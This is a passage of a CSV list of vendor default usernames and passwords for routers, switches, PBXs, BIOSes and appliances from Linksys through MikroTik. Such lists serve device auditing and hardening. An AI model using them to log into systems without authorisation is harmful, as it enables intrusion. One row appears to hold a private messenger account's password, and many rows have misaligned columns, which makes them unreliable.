(4),,,blank,admin,,,\nlinksys,BEFSR81,,http://192.168.0.1,admin,password,Administration,,\nlinksys,BEFSX41,,192.168.1.1,,admin,Admin,,\nlinksys,BEFW11S4 Router,,,,admin,,,\nlinksys,BEFW11S4,,1,admin,,,,\nlinksys,BEFW11S4,,Admin,admin,,,,\nlinksys,BEFW11S4,1,HTTP,admin,,Admin,,\nlinksys,BEFW11S4,4,http://192.168.1.245,,,,,\nlinksys,Comcast,Comcast-supplied,HTTP,comcast,1234,diagnostics,192.168.0.1/docsisdevicestatus.asp,\nlinksys,DSL,,,,admin,,,\nlinksys,DSL,,Admin,,admin,,,\nlinksys,DSL,,Telnet,,admin,Admin,,\nlinksys,E1000,,192.168.1.1,,admin,Admin,,\nlinksys,E1200,,192.168.1.1,admin,admin,Admin,,\nlinksys,E2000,,192.168.1.1,admin,admin,Admin,,\nlinksys,E2100L,,192.168.1.1,admin,admin,Admin,,\nlinksys,E3000,,,admin,admin,,,\nlinksys,E3000,,192.168.1.1,admin,admin,Admin,,\nlinksys,E3000,,192.168.1.1,admin,admin,admin,,\nlinksys,E4200,,192.168.1.1,admin,admin,Admin,,\nlinksys,EA2700,,,admin,admin,,,\nlinksys,EF1324,,multi,admin,,,,\nlinksys,EF1704,,multi,admin,,,,\nlinksys,EFG250,,,admin,admin,,,\nlinksys,EFG250,2,HTTP,admin,admin,,,\nlinksys,EtherFast Cable/DSL ROuter,,,Administrator,admin,,,\nlinksys,EtherFast Cable/DSL ROuter,,Admin,Administrator,admin,,,\nlinksys,EtherFast Cable/DSL ROuter,,Multi,Administrator,admin,Admin,,\nlinksys,EtherFast Cable/DSL Router,,,admin,,,,\nlinksys,EtherFast Cable/DSL Router,,Admin,admin,,,,\nlinksys,EtherFast Cable/DSL Router,,HTTP,admin,,Admin,,\nlinksys,EtherFast Cable/DSL Router,,Multi,Administrator,admin,Admin,,\nlinksys,Linksys Router DSL/Cable,,,,admin,,,\nlinksys,Linksys Router DSL/Cable,,Admin,,admin,,,\nlinksys,Linksys Router DSL/Cable,,HTTP,,admin,Admin,,\nlinksys,PAP2,,,admin,,Admin,,\nlinksys,PC22224,1,multi,admin,,Admin,,\nlinksys,PC22224,1.0,multi,admin,,Admin,,\nlinksys,PC22604,1,multi,admin,,Admin,,\nlinksys,PC22604,1.0,multi,admin,,Admin,,\nlinksys,PSUS4 USB Print Server,,,admin,admin,Administrator,,\nlinksys,RT31P2,,http://192.168.15.1,,admin,Administration,,\nlinksys,RT31P2,,http://192.168.15.1,admin,admin,Administration,,\nlinksys,RT31P2,,http://192.168.15.1/Voice_adminPage.htm,admin,admin,Voice Admin,,\nlinksys,RT31P2-AT,,http://192.168.15.1,,admin,Administration,,\nlinksys,RTP300 w/2 phone ports,1,http://192.168.15.1,admin,admin,Admin,,\nlinksys,RTP300 w/2 phone ports,1,http://192.168.15.1,user,tivonpw,update access,use for flashing firmware,\nlinksys,RV0041,,http://192.168.1.1,admin,admin,Administration,,\nlinksys,RV042,,http://192.168.1.1,admin,admin,Administration,,\nlinksys,RVS4000,,http://192.168.1.1,admin,admin,,,\nlinksys,SFE2000,,http,admin,,Admin,,\nlinksys,SFE2000,,http,l1_admin,,Admin,,\nlinksys,SFE2000P,,http,admin,,Admin,,\nlinksys,SFE2000P,,http,l1_admin,,Admin,,\nlinksys,SGE2000,,http,admin,,Admin,,\nlinksys,SGE2000,,http,l1_admin,,Admin,,\nlinksys,SGE2000P,,http,admin,,Admin,,\nlinksys,SGE2000P,,http,l1_admin,,Admin,,\nlinksys,SLM2008,,http://192.168.1.254,admin,,Administration,,\nlinksys,SPA400,,http,Admin,,Admin,,\nlinksys,SPA9000,,http,Admin,,Admin,,\nlinksys,SRW2008,,http://192.168.1.254,admin,,Admin,,\nlinksys,SRW2008MP,,http://192.168.1.254,admin,,Admin,,\nlinksys,SRW2008P,,http://192.168.1.254,admin,,Admin,,\nlinksys,SRW2016,,http://192.168.1.254,admin,,Admin,,\nlinksys,SRW2024,,http://192.168.1.254,admin,,Admin,,\nlinksys,SRW2048,,http://192.168.1.254,admin,,Admin,,\nlinksys,SRW208,,http://192.168.1.254,admin,,Admin,,\nlinksys,SRW208G,,http://192.168.1.254,admin,,Admin,,\nlinksys,SRW208L,,http://192.168.1.254,admin,,Admin,,\nlinksys,SRW208MP,,http://192.168.1.254,admin,,Admin,,\nlinksys,SRW208P,,http://192.168.1.254,admin,,Admin,,\nlinksys,SRW224,,http://192.168.1.254,admin,,Admin,,\nlinksys,SRW224G4,,http://192.168.1.254,admin,,Admin,,\nlinksys,SRW248G4,,http://192.168.1.254,admin,,Admin,,\nlinksys,SVR200,,,(AA Admin number),4x98,Autoattendant,,\nlinksys,SVR200,,,(AA Admin number),4x99,Autoattendant,,\nlinksys,SVR200,,,(username),3+(extension),User Access,,\nlinksys,SVR200,,,,3450,Operator voicemailbox,,\nlinksys,SVR200,,,,498,Autoattendant,,\nlinksys,SVR3000,,,(AA Admin number),4x98,Autoattendant,,\nlinksys,SVR3000,,,(AA Admin number),4x99,Autoattendant,,\nlinksys,SVR3000,,,(username),3+(extension),User Access,,\nlinksys,SVR3000,,,,3450,Operator voicemailbox,,\nlinksys,SVR3000,,,,498,Autoattendant,,\nlinksys,SVR3500,,,(AA Admin number),4x98,Autoattendant,,\nlinksys,SVR3500,,,(AA Admin number),4x99,Autoattendant,,\nlinksys,SVR3500,,,(username),3+(extension),User Access,,\nlinksys,SVR3500,,,,3450,Operator voicemailbox,,\nlinksys,SVR3500,,,,498,Autoattendant,,\nlinksys,WAG120N,,http://192.168.1.1,admin,admin,Administration,,\nlinksys,WAG160N,,http://192.168.1.1 or 10.1.1.1,admin,admin,Administration,,\nlinksys,WAG200G,,http://192.168.1.1,admin,admin,Administration,,\nlinksys,WAG320N,,http://192.168.1.1,admin,admin,Admin,,\nlinksys,WAG325N,,http://192.168.1.1,admin,admin,Administration,,\nlinksys,WAG54G,,HTTP,admin,admin,Admin,,\nlinksys,WAG54G,All,192.168.1.1,admin,admin,Admin,,\nlinksys,WAG54G2,,http://192.168.1.1,admin,admin,Administration,,\nlinksys,WAG54GP2,,http://192.168.1.1,admin,admin,Administration,,\nlinksys,WAG54GS,,192.168.1.1,admin,admin,Admin,,\nlinksys,WAG54GS,,Multi,admin,admin,Admin,,\nlinksys,WAG54GX2,,http://192.168.1.1,admin,admin,Administration,,\nlinksys,WAP Router,,4 Port 2.4GHz,,admin,,,\nlinksys,WAP11,,,admin,admin,,,\nlinksys,WAP11,,Multi,,,Admin,,\nlinksys,WAP200,,http://192.168.1.245,,admin,Admin,,\nlinksys,WAP4400N,,http://192.168.1.245,,admin,Admin,,\nlinksys,WAP4400N,business series,192.168.1.245,admin,admin,admin,,\nlinksys,WAP44OON,2,4-GHZ,http://192.168.1.245,Admin,Admin,,\nlinksys,WAP51AB,,console,,Admin,Admin,,\nlinksys,WAP54A,,http://192.168.1.252,,admin,Web-Based Config Utility,,\nlinksys,WAP54G Router,,http://192.168.1.245,,admin,,,\nlinksys,WAP54G,,,,admin,,,\nlinksys,WAP54G,2,http://192.168.1.245,,admin,Admin,,\nlinksys,WAP54GP,,http://192.168.1.245,admin,admin,Administration,,\nlinksys,WAP54GPE,,http://192.168.1.245,admin,admin,Administration,,\nlinksys,WAP54GX,,http://192.168.1.245,admin,admin,Administration,,\nlinksys,WAP54GX,1,web,,admin,192.168.1.245,There is no username; it will not work if you connect with a username.,\nlinksys,WAP54GX,1.0,web ,,admin,192.168.1.245,There is no username; it will not work if you connect with a username.,\nlinksys,WAP55AG,1,2,http://192.168.1.246,,admin,,\nlinksys,WAP55AG,1.0, 2.0 ,http://192.168.1.246,,admin,,\nlinksys,WCG200,,http://192.168.0.1,,admin,Administration,,\nlinksys,WET11,,,,admin,Admin,,\nlinksys,WET54G,,,,admin,Admin,,\nlinksys,WET610N,,http://192.168.1.250,admin,admin,Administration,,\nlinksys,WGA11B,,,,admin,Admin,,\nlinksys,WGM124,,http://192.168.1.1,admin,password,Admin,,\nlinksys,WGR101,,http://192.168.0.1,admin,password,Admin,,\nlinksys,WMB54G,,,,admin,Admin,,\nlinksys,WRK54G Router,,,,admin,,,\nlinksys,WRK54G Router,,192.168.1.1,root,,Admin,,\nlinksys,WRK54G,,192.168.1.1,,admin,Admin,,\nlinksys,WRP400,,192.168.15.1 or 192.168.16.1,admin,admin,,,\nlinksys,WRT120N,,192.168.1.1,,admin,Admin,,\nlinksys,WRT150N,,192.168.1.1,admin,admin,,,\nlinksys,WRT160N,V2,http://192.168.1.1,admin,admin,admin,,\nlinksys,WRT160NL,,http://192.168.1.1,admin,admin,admin,,\nlinksys,WRT160n,V2,http://192.168.1.1,admin,admin,admin,,\nlinksys,WRT300N,,http://192.168.1.1,,admin,Administration,,\nlinksys,WRT310N,,http://192.168.1.1,,admin,Admin,,\nlinksys,WRT320N,,http://192.168.1.1,,admin,Admin,,\nlinksys,WRT350N,,http://192.168.1.1,admin,admin,admin,,\nlinksys,WRT400,,http://192.168.1.1,,admin,Admin,,\nlinksys,WRT54G Router,,,,admin,,,\nlinksys,WRT54G v4,2.4,http:192.168.1.245,,admin,,,\nlinksys,WRT54G,,Admin,admin,admin,,,\nlinksys,WRT54G,,HTTP,admin,admin,Admin,,\nlinksys,WRT54G,2.4,http:192.168.1.245,,admin,,,\nlinksys,WRT54G2,,192.168.1.1,admin,admin,Admin,,\nlinksys,WRT54G3G,,192.168.1.1,,admin,Admin,,\nlinksys,WRT54GC,,,admin,admin,,,\nlinksys,WRT54GC,,192.168.1.1,,admin,Admin,,\nlinksys,WRT54GC,,http://192.168.1.1,,admin,Administration,,\nlinksys,WRT54GH,,http://192.168.1.1,,admin,Administration,,\nlinksys,WRT54GL,,192.168.1.1,admin,admin,Admin,,\nlinksys,WRT54GL,,http://192.168.1.1,,admin,Administration,,\nlinksys,WRT54GP2,,http://192.168.15.1,,admin,Administration,,\nlinksys,WRT54GP2A-AT,,http://192.168.15.1,,admin,Administration,,\nlinksys,WRT54GR,,http://192.168.1.1,,admin,Administration,,\nlinksys,WRT54GS Router,,,,admin,,,\nlinksys,WRT54GS,,Admin,admin,admin,,,\nlinksys,WRT54GS,1.1,HTTP,admin,admin,Admin,,\nlinksys,WRT54GX,,http://192.168.1.1,,admin,Administration,,\nlinksys,WRT54GX2,,http://192.168.1.1,,admin,Administration,,\nlinksys,WRT54GX4,,http://192.168.1.1,,admin,Administration,,\nlinksys,WRT55AG Router,,,,admin,,,\nlinksys,WRT600,,http://192.168.1.1,,admin,Admin,,\nlinksys,WRT600N,,http://192.168.1.1,admin,admin,Admin,,\nlinksys,WRT610N,,http://192.168.1.1,admin,admin,Admin,,\nlinksys,WRTP54G-ER,,http://192.168.15.1,admin,admin,Admin,,\nlinksys,WRTSL54GS,,http://192.168.1.1,,admin,Administration,,\nlinksys,WRV54G,,,admin,admin,,,\nlinksys,WRV54G,,Multi,admin,admin,,,\nlinksys,WRVS4400N,,192.168.1.1,admin,admin,Admin,,\nlinksys,WTR54GS,,192.168.16.1,,admin,Administration,,\nlinksys,WTR54GS,,http://192.168.16.1,,admin,Administration,,\nlinksys,X3000,,192.168.1.1,admin,admin,Admin,,\nlinksys,wrt110,,admin,admin,admin,,,\nlinksyssipura,SPA-1001,,,admin,,2012-01-08,,\nlinksyssipura,SPA-2100,,192.168.0.1,admin,,2012-01-08,,\nlinksyssipura,SPA-2102,,,,,2012-01-08,,\nlinksyssipura,SPA-3000,,,admin,admin,2012-01-08,,\nlinksyssipura,SPA-3102,,,admin,,2012-01-08,,\nlinunx,Linux,,,Administrator,admin,,,\nlinux,Slackware,,,gonzo,,,,\nlinux,Slackware,,,satan,,,,\nlinux,Slackware,,,snake,,,,\nlinux,Slackware,,Multi,gonzo,,User,,\nlinux,Slackware,,Multi,satan,,User,,\nlinux,Slackware,,Multi,snake,,User,,\nlinux,Slackware,,User,gonzo,,,,\nlinux,Slackware,,User,satan,,,,\nlinux,Slackware,,User,snake,,,,\nlinux,UCLinux for UCSIMM,,,root,uClinux,,,\nlinux,UCLinux for UCSIMM,,Admin,root,uClinux,,,\nlinux,UCLinux for UCSIMM,,Multi,root,uClinux,Admin,,\nlinux,back trak,3 and 4,,root,toor,,penetration version hacking WiFi,\nliquidwarelabs,Stratusphere UX,,,ssadmin,sspassword,,,\nlivingston,IRX Router,,,!root,,,,\nlivingston,IRX Router,,Telnet,!root,,,,\nlivingston,Livingston Portmaster 3,,,!root,,,,\nlivingston,Officerouter,,,!root,,,,\nlivingston,Officerouter,,,!root,blank,,,\nlivingston,Officerouter,,Telnet,!root,,,,\nlivingston,Portmaster 2R,,Telnet,root,,Admin,,\nlivingston,Portmaster 3,,Telnet,!root,,,,\nlivingston,Portmaster,03-Feb,,!root,blank,,,\nlivingston,Portmaster,2/3,,!root,blank,,,\nlivingstone,Portmaster 2R,,,root,,,,\nlivingstone,Portmaster 2R,,Admin,root,,,,\nlockdownnetworks,All Lockdown Products,up to 2.7,Console,setup,changeme(exclamation),User,,\nlogitech,Logitech Mobile Headset,,Bluetooth,,0,audio access,,\nloglogic,Loglogic Appliance,,,root,logapp,,,\nloglogic,Loglogic Appliance,,,toor,logapp,,,\nlongshine,isscfg,,,admin,0,,,\nlongshine,isscfg,,HTTP,admin,0,Admin,,\nlucent,AP-1000,,,public,public,,,\nlucent,Anymedia,,,LUCENT01,UI-PSWD-01,,,\nlucent,Anymedia,,,LUCENT02,UI-PSWD-02,,,\nlucent,Anymedia,,Admin,LUCENT01,UI-PSWD-01,,,\nlucent,Anymedia,,Admin,LUCENT02,UI-PSWD-02,,,\nlucent,Anymedia,,Console,LUCENT01,UI-PSWD-01,Admin,requires GSI software,\nlucent,Anymedia,,Console,LUCENT02,UI-PSWD-02,Admin,requires GSI software,\nlucent,B-STDX9000,,,(any 3 characters),cascade,,,\nlucent,B-STDX9000,,,(any 3 chars),cascade,,,\nlucent,B-STDX9000,,,,cascade,,,\nlucent,B-STDX9000,,Multi,(any 3 characters),cascade,,,\nlucent,B-STDX9000,,SNMP readwrite,,cascade,,,\nlucent,B-STDX9000,,all,,cascade,,,\nlucent,B-STDX9000,,debug mode,,cascade,,,\nlucent,B-STDX9000,all,SNMP,,cascade,Admin,,\nlucent,CBX 500,,,(any 3 characters),cascade,,,\nlucent,CBX 500,,,,cascade,,,\nlucent,CBX 500,,Multi,(any 3 characters),cascade,,,\nlucent,CBX 500,,SNMP readwrite,,cascade,,,\nlucent,CBX 500,,debug mode,,cascade,,,\nlucent,Cajun Family,,,root,root,,,\nlucent,Cellpipe 22A-BX-AR USB D,,Console,admin,AitbISP4eCiG,Admin,,\nlucent,GX 550,,,(any 3 characters),cascade,,,\nlucent,GX 550,,,,cascade,,,\nlucent,GX 550,,Multi,(any 3 characters),cascade,,,\nlucent,GX 550,,SNMP readwrite,,cascade,,,\nlucent,GX 550,,debug mode,,cascade,,,\nlucent,M770,,Telnet,super,super,Admin,,\nlucent,MAX-TNT,,,admin,Ascend,,,\nlucent,MAX-TNT,,Multi,admin,Ascend,,,\nlucent,Max TNT,,9.1.3,,admin,,,\nlucent,PSAX 1200 and below,,,root,ascend,,,\nlucent,PSAX 1200 and below,,Multi,root,ascend,,,\nlucent,PSAX 1250 and above,,,readonly,lucenttech2,,,\nlucent,PSAX 1250 and above,,,readwrite,lucenttech1,,,\nlucent,PSAX 1250 and above,,Multi,readonly,lucenttech2,,,\nlucent,PSAX 1250 and above,,Multi,readonly,lucenttech2,Admin,,\nlucent,PSAX 1250 and above,,Multi,readwrite,lucenttech1,,,\nlucent,PSAX 1250 and above,,Multi,readwrite,lucenttech1,Admin,,\nlucent,PacketStar,,Multi,Administrator,,Admin,,\nlucent,Packetstar (PSAX),,,readwrite,lucenttech1,,,\nlucent,Portmaster 2,,,!root,,,,\nlucent,Portmaster 3,,,!root,!ishtar,,,\nlucent,Portmaster 3,,,!root,!ishtar,,unknown,\nlucent,Stinger,,,admin,Ascend,,,\nlucent,System 75,,,bciim,bciimpw,,,\nlucent,System 75,,,bcim,bcimpw,,,\nlucent,System 75,,,bcms,bcmspw,,,\nlucent,System 75,,,bcnas,bcnaspw,,,\nlucent,System 75,,,blue,bluepw,,,\nlucent,System 75,,,browse,browsepw,,,\nlucent,System 75,,,browse,looker,,,\nlucent,System 75,,,craft,craft,,,\nlucent,System 75,,,craft,craftpw,,,\nlucent,System 75,,,cust,custpw,,,\nlucent,System 75,,,enquiry,enquirypw,,,\nlucent,System 75,,,field,support,,,\nlucent,System 75,,,inads,inads,,,\nlucent,System 75,,,inads,indspw,,,\nlucent,System 75,,,init,initpw,,,\nlucent,System 75,,,locate,locatepw,,,\nlucent,System 75,,,maint,maintpw,,,\nlucent,System 75,,,maint,rwmaint,,,\nlucent,System 75,,,nms,nmspw,,,\nlucent,System 75,,,pw,pwpw,,,\nlucent,System 75,,,rcust,rcustpw,,,\nlucent,System 75,,,support,supportpw,,,\nlucent,System 75,,,sysadm,sysadmpw,,,\nlucent,System 75,,,tech,field,,,\nlucent,System 75,,Multi,bciim,bciimpw,,,\nlucent,System 75,,Multi,bcim,bcimpw,,,\nlucent,System 75,,Multi,bcms,bcmspw,,,\nlucent,System 75,,Multi,bcnas,bcnaspw,,,\nlucent,System 75,,Multi,blue,bluepw,,,\nlucent,System 75,,Multi,browse,browsepw,,,\nlucent,System 75,,Multi,browse,looker,,,\nlucent,System 75,,Multi,craft,craft,,,\nlucent,System 75,,Multi,craft,craftpw,,,\nlucent,System 75,,Multi,cust,custpw,,,\nlucent,System 75,,Multi,enquiry,enquirypw,,,\nlucent,System 75,,Multi,field,support,,,\nlucent,System 75,,Multi,inads,inads,,,\nlucent,System 75,,Multi,inads,indspw,,,\nlucent,System 75,,Multi,init,initpw,,,\nlucent,System 75,,Multi,locate,locatepw,,,\nlucent,System 75,,Multi,maint,maintpw,,,\nlucent,System 75,,Multi,maint,rwmaint,,,\nlucent,System 75,,Multi,nms,nmspw,,,\nlucent,System 75,,Multi,pw,pwpw,,,\nlucent,System 75,,Multi,rcust,rcustpw,,,\nlucent,System 75,,Multi,support,supportpw,,,\nlucent,System 75,,Multi,sysadm,admpw,,,\nlucent,System 75,,Multi,sysadm,sysadmpw,,,\nlucent,System 75,,Multi,sysadm,syspw,,,\nlucent,System 75,,Multi,tech,field,,,\nluxoncommunications,IP Phone,,http,administrator,19750407,Admin,,\nluxul,ABR-4400,,192.168.0.1,admin,admin,Admin,,\nluxul,AMS-2616P,,192.168.0.4,admin,admin,Admin,,\nluxul,AMS-4424P,,192.168.0.4,admin,admin,Admin,,\nluxul,XAP-1010,,192.168.0.10,admin,admin,Admin,,\nluxul,XAP-1020,,192.168.0.11,admin,admin,Admin,A few units were shipped with default IP 192.168.0.15 - try that if 192.168.0.11 doesn't work,\nluxul,XAP-1030,,192.168.0.12,admin,admin,Admin,,\nluxul,XAP-1032,,192.168.0.13,admin,admin,Admin,,\nluxul,XAP-1040,,192.168.0.14,admin,admin,Admin,,\nluxul,XAP-1050,,192.168.0.15,admin,admin,Admin,,\nluxul,XAP-1200,,192.168.0.10,admin,admin,Admin,,\nluxul,XAP-1230,,192.168.0.10,admin,admin,Admin,,\nluxul,XAP-1500,,192.168.0.16,admin,admin,Admin,,\nluxul,XAP-310,,192.168.0.10,admin,admin,Admin,,\nluxul,XBR-2300,,192.168.0.1,admin,admin,Admin,,\nluxul,XBR-4400,,192.168.0.1,admin,admin,Admin,,\nluxul,XFS-1816P,,192.168.0.4,admin,admin,Admin,,\nluxul,XMS-1008P,,192.168.0.3,admin,admin,Admin,,\nluxul,XMS-1010P,,192.168.0.3,admin,admin,Admin,,\nluxul,XMS-1024,,192.168.0.2,admin,admin,Admin,,\nluxul,XMS-1024P,,192.168.0.4,admin,admin,Admin,,\nluxul,XMS-2624P,,192.168.0.4,admin,admin,Admin,,\nluxul,XVW-P30,,192.168.0.11,admin,admin,Admin,,\nluxul,XVW-P30E,,192.168.0.11,admin,admin,Admin,,\nluxul,XWC-1000,,192.168.0.19,admin,admin,Admin,,\nluxul,XWR-1750,,192.168.0.1,admin,admin,Admin,,\nluxul,XWS-1310,,192.168.0.19,admin,admin,Admin,,\nm technology,PC BIOS,,,,mMmM,,,\nm technology,PC BIOS,,Admin,,mMmM,,,\nmachspeed,PC BIOS,,,,sp99dd,,,\nmachspeed,PC BIOS,,Admin,,sp99dd,,,\nmachspeed,PC BIOS,,Console,,sp99dd,Admin,,\nmacromedia,Dreamweaver,,,,admin,,,\nmacromedia,Dreamweaver,,FTP,,admin,Guest,,\nmacromedia,Dreamweaver,,Guest,,admin,,,\nmacsense,X-Router Pro,,,admin,admin,,,\nmagento,Go,,,admin,123123,,,\nmagic-pro,PC BIOS,,,,prost,,,\nmagic-pro,PC BIOS,,Admin,,prost,,,\nmagicpro,PC BIOS,,Console,,prost,Admin,,\nmain street softworks,MCVE,,2.5,MCVEADMIN,password,,,\nmain street softworks,MCVE,,Admin,MCVEADMIN,password,,,\nmainstreetsoftworks,MCVE,2.5,Multi,MCVEADMIN,password,Admin,,\nmambo,Site Server,,4.x,admin,admin,,,\nmambo,Site Server,4.x,HTTP,admin,admin,Admin,,\nmanageengine,ADSelfService Plus,,,admin,admin,,,\nmanageengine,Desktop Central,,,admin,admin,,,\nmandarinlibraryautomation,M3,,,admin,boca raton,,,\nmantis,Mantis,,,administrator,root,,,\nmantis,Mantis,,,administrator,root,Admin,,\nmanufactor,Product,,Access_Validated,User,Password,,,\nmarconi,Fore ATM Switches,,,ami,,,,\nmarconi,Fore ATM Switches,,Admin,ami,,,,\nmarconi,Fore ATM Switches,,Multi,ami,,Admin,,\nmaxdata,ms2137,,Multi,,,Admin,,\nmaxon,EtherMax,,192.168.0.1,admin,admin,Admin,,\nmcafee,3100,4.x, 5.x,local, ssh,root,root,\nmcafee,3100,4.x,5.x,local,ssh,root,!scmchangeme,\nmcafee,IntruShield IPS Sensor,,,admin,admin123,,,\nmcafee,IntruShield IPS Sensor,1.8,SSH,admin,admin123,,,\nmcafee,IntruShield IPS Sensor,1.9,SSH,admin,admin123,,,\nmcafee,IntruShield IPS Sensor,2.1,SSH,admin,admin123,,,\nmcafee,IntruShield IPS Sensor,3.1,SSH,admin,admin123,,,\nmcafee,IntruShield Manager,,,admin,admin123,,,\nmcafee,IntruShield Manager,1.8,HTTP,admin,admin123,,,\nmcafee,IntruShield Manager,1.9,HTTP,admin,admin123,,,\nmcafee,IntruShield Manager,2.1,HTTP,admin,admin123,,,\nmcafee,IntruShield Manager,3.1,HTTP,admin,admin123,,,\nmcafee,SCM 3100,4.1,Multi,scmadmin,scmchangeme,Admin,,\nmcafee,SCM 3200,,http,scmadmin,changeme,Admin,,\nmcafee,e250,,,webshield,webshieldchangeme,,,\nmcafee,e250,,HTTP,webshield,webshieldchangeme,,,\nmcdata,FC Switches/Directors,,Multi,Administrator,password,Admin,,\nmediatrix,2102,,http://x.x.x.x:8080,root,5678,,,\nmediatrix2102,,,http://192.168.1.102,admin,1234,,,\nmediatrix2102,mediatrix 2102,,HTTP,admin,1234,Admin,,\nmedion,Routers,,HTTP,,medion,Admin,,\nmegastar,BIOS,,Console,,star,Admin,,\nmegastar,PC BIOS,,,,star,,,\nmegastar,PC BIOS,,Admin,,star,,,\nmegastar,PC BIOS,,Console,,star,Admin,,\nmelco,AirStation WLA-L11,,,root,,,Root acct cannot be changed, no password by default,\nmelco,AirStation WLA-L11,,,root,,,Root acct cannot be changed,no password by default\nmemotec,CX Line,,Console,memotec,supervisor,,,\nmemotec,CX Line,Any,Multi,memotec,supervisor,Console,,\nmentec,Micro/RSX,,,MICRO,RSX,,,\nmentec,Micro/RSX,,,MICRO,RSX,Admin,,\nmentec,Micro/RSX,,Admin,MICRO,RSX,,,\nmentec,Micro/RSX,,Multi,MICRO,RSX,Admin,,\nmercury interactive,Topaz Prism,,,admin,admin,,,\nmercury,234234,,234234,Administrator,admin,,,\nmercury,234234,,Admin,Administrator,admin,,,\nmercury,234234,234234,SNMP,Administrator,admin,Admin,,\nmercury,KT133A/686B,,,Administrator,admin,,,\nmercury,KT133A/686B,,Admin,Administrator,admin,,,\nmercury,KT133A/686B,,SNMP,Administrator,admin,Admin,,\nmercury,Topaz Prism,,http,admin,admin,Admin,,\nmeridian,PBX,ANY,Telnet,service,smile,System,This is the default password on most Meridian systems.,\nmetro,phone,,voicemail,client,client,,,\nmichiel,PHPList,2.6.4,http,admin,phplist,Admin,,\nmichiel,PHPlist,,2.6.4,admin,phplist,,,\nmicro soft,yahoo messenger,,,sherzad420,pakistan,,,\nmicrocom,ADSL Routers,,,admin,epicrouter,Admin,,\nmicrocom,ADSL Routers,,,user,password,Admin,,\nmicrocom,Unknown,,,admin,superuser,,,\nmicrocom,hdms,,,system,hdms,,,\nmicrocom,hdms,,,system,hdms,,unknown,\nmicron,PC BIOS,,,,sldkj754,,,\nmicron,PC BIOS,,,,xyzall,,,\nmicron,PC BIOS,,Admin,,sldkj754,,,\nmicron,PC BIOS,,Admin,,xyzall,,,\nmicron,PC BIOS,,Console,,sldkj754,Admin,,\nmicron,PC BIOS,,Console,,xyzall,Admin,,\nmicronet,3351 / 3354,,Multi,admin,epicrouter,Admin,,\nmicronet,Access Point,,Admin,root,default,,,\nmicronet,Access Point,,SP912,root,default,,,\nmicronet,SP3356,,,admin,epicrouter,,,\nmicronet,SP3356,,HTTP,admin,epicrouter,,,\nmicronet,SP3357,,HTTP,admin,epicrouter,admin,,\nmicronet,SP3357,,admin,admin,epicrouter,,,\nmicronet,SP5002,,Console,mac,,Admin,,\nmicronet,SP756,,HTTP,admin,1234,admin,,\nmicronet,SP912 Access Point,,Telnet,root,default,Admin,,\nmicronet,SP916BM Wireless Broadband Router,,http,admin,admin,Admin,,\nmicronet,SP916GK,V2,HTTP,admin,,Admin,,\nmicronet,Wireless Broadband Router,,SP916BM,admin,admin,,,\nmicronica,SOHOmate HiP-400,,192.168.123.254,,admin,Admin,,\nmicronica,SOHOmate WiP-400,,192.168.123.254,,admin,Admin,,\nmicronics,PC BIOS,,,,dn_04rjc,,,\nmicronics,PC BIOS,,Admin,,dn_04rjc,,,\nmicronics,PC BIOS,,Console,,dn_04rjc,Admin,,\nmicroplex,Print Server,,,root,root,,,\nmicroplex,Print Server,,Admin,root,root,,,\nmicroplex,Print Server,,Telnet,root,root,Admin,,\nmicrorouter,900i,,,,letmein,,,\nmicrorouter,900i,,Admin,,letmein,,,\nmicrorouter,900i,,Console/Multi,,letmein,Admin,,\nmicrosoft,200 server,,,,,,,\nmicrosoft,Great Plains,,,LessonUser1,,,,\nmicrosoft,Great Plains,,,LessonUser2,,,,\nmicrosoft,Great Plains,All,Multi,LessonUser1,,,,\nmicrosoft,Great Plains,All,Multi,LessonUser2,,,,\nmicrosoft,MN-100,,http://192.168.2.1,,admin,Administration,,\nmicrosoft,MN-500,,http://192.168.2.1,,admin,Administration,,\nmicrosoft,MN-700,,http://192.168.2.1,,admin,Administration,,\nmicrosoft,MN500 Base Station,,,,admin,Admin,,\nmicrosoft,MN700 Wireless AP/Router,,,MSHOME,MSHOME,,,\nmicrosoft,NT,,,,start,,,\nmicrosoft,NT,,,free user,user,,4,\nmicrosoft,SQL Server 2000,,SP3,sa,,,,\nmicrosoft,SQL Server,,,,sa,,,\nmicrosoft,SQL Server,,7,sa,,,,\nmicrosoft,SQL Server,,Admin,sa,,,,\nmicrosoft,SQL Server,7,Multi,sa,,Admin,,\nmicrosoft,SiteServer,,3.x,LDAP_Anonymous,LdapPassword_1,,,\nmicrosoft,SiteServer,3.x,http,LDAP_Anonymous,LdapPassword_1,,,\nmicrosoft,Windows NT,,,,,,,\nmicrosoft,Windows NT,,,Administrator,,,,\nmicrosoft,Windows NT,,,Administrator,,,All,\nmicrosoft,Windows NT,,,Administrator,Administrator,,,\nmicrosoft,Windows NT,,,Guest,,,All,\nmicrosoft,Windows NT,,,Guest,Guest,,,\nmicrosoft,Windows NT,,,IS_$hostname,(same),,,\nmicrosoft,Windows NT,,,Mail,,,All,\nmicrosoft,Windows NT,,,User,User,,,\nmicrosoft,Windows NT,,,pkoolt,pkooltPS,,4,\nmicrosoft,Windows NT,,Admin,Administrator,,,,\nmicrosoft,Windows NT,,Admin,Administrator,Administrator,,,\nmicrosoft,Windows NT,,Multi,Administrator,,Admin,,\nmicrosoft,Windows NT,,Multi,Administrator,Administrator,Admin,,\nmicrosoft,Windows NT,,Multi,Guest,,User,,\nmicrosoft,Windows NT,,Multi,Guest,Guest,User,,\nmicrosoft,Windows NT,,Multi,IS_$hostname,(same),User,hostname is your servername,\nmicrosoft,Windows NT,,Multi,User,User,User,,\nmicrosoft,Windows NT,,User,Guest,,,,\nmicrosoft,Windows NT,,User,Guest,Guest,,,\nmicrosoft,Windows NT,,User,IS_$hostname,(same),,,\nmicrosoft,Windows NT,,User,User,User,,,\nmicrosoft,Windows Storage Server 2008,,,Administrator,wSS2008!,,,\nmike peters,BasiliX,,1.1.1,bsxuser,bsxpass,,,\nmikepeters,BasiliX,1.1.1,sql,bsxuser,bsxpass,Admin,,\nmikrotik,,2.27,,admin,,172.16.11.1,,\nmikrotik,,2.9.27,,admin,admin,,,\nmikrotik,,2.9.27,http://10.0.0.138,admin,,,,\nmikrotik,,3.20,192.168.2.2,admin,0111313071,,MikroTik,\nmikrotik,,MikroTik v3.25,telnet,admin,admin,root,hello,\nmikrotik,Groove 5Hn,,192.168.88.1,admin,,Admin,,\nmikrotik,Groove a5Hn,,,admin,,Admin,,\nmikrotik,MKE-3.28, 3.28 